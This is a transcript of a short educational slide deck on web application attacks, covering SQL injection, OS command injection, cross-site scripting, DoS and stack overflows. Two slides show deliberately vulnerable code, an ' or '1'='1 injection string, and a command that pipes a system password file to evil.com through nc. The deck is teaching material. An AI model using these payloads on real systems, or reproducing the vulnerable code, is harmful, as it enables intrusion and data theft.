web application attack presentation
TRANSCRIPT
![Page 1: Web application attack Presentation](https://reader035.vdocuments.site/reader035/viewer/2022071922/55d062d0bb61eba67f8b45c9/html5/thumbnails/1.jpg)
Web Application Attack
Nguyễn Kiều Khoa
![Page 2: Web application attack Presentation](https://reader035.vdocuments.site/reader035/viewer/2022071922/55d062d0bb61eba67f8b45c9/html5/thumbnails/2.jpg)
- A web application or web app is any software that runs in a web browser. It is created in a browser-supported programming language (such as the combination of JavaScript, HTML and CSS) and relies on a web browser to render the application.
http://en.wikipedia.org/wiki/Web_application
What is a web application?
![Page 3: Web application attack Presentation](https://reader035.vdocuments.site/reader035/viewer/2022071922/55d062d0bb61eba67f8b45c9/html5/thumbnails/3.jpg)
1.Injection (SQL Injection)db.ExecuteReader("select * from users where name='" + Request["user"] + "' and password='" + Request["password"] + "'");
- Suppose the user request parameter is …' or '1'='1
- Then the query we execute is … (note that and has precedence over or)
select * from users where name='' or '1'='1' and password='whatever'
![Page 4: Web application attack Presentation](https://reader035.vdocuments.site/reader035/viewer/2022071922/55d062d0bb61eba67f8b45c9/html5/thumbnails/4.jpg)
- Suppose we’re too lazy to perform DNS lookup, so we resort to the following:
- Suppose the hostname parameter is …
foo || cat /etc/password | nc evil.com
- Then we end up sending the password file to evil.com
1.Injection (OS Command)
system("nslookup " + Request["hostname"]);
![Page 5: Web application attack Presentation](https://reader035.vdocuments.site/reader035/viewer/2022071922/55d062d0bb61eba67f8b45c9/html5/thumbnails/5.jpg)
- Injecting JavaScript into pages viewed by other users.
2.Cross-Site Scripting
![Page 6: Web application attack Presentation](https://reader035.vdocuments.site/reader035/viewer/2022071922/55d062d0bb61eba67f8b45c9/html5/thumbnails/6.jpg)
- denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users
http://en.wikipedia.org/wiki/Denial-of-service_attack
3.DoS and DDoS
![Page 7: Web application attack Presentation](https://reader035.vdocuments.site/reader035/viewer/2022071922/55d062d0bb61eba67f8b45c9/html5/thumbnails/7.jpg)
- A stack buffer overflow or stack buffer overrun occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer.
4.Stack Overflow
![Page 8: Web application attack Presentation](https://reader035.vdocuments.site/reader035/viewer/2022071922/55d062d0bb61eba67f8b45c9/html5/thumbnails/8.jpg)
Q&A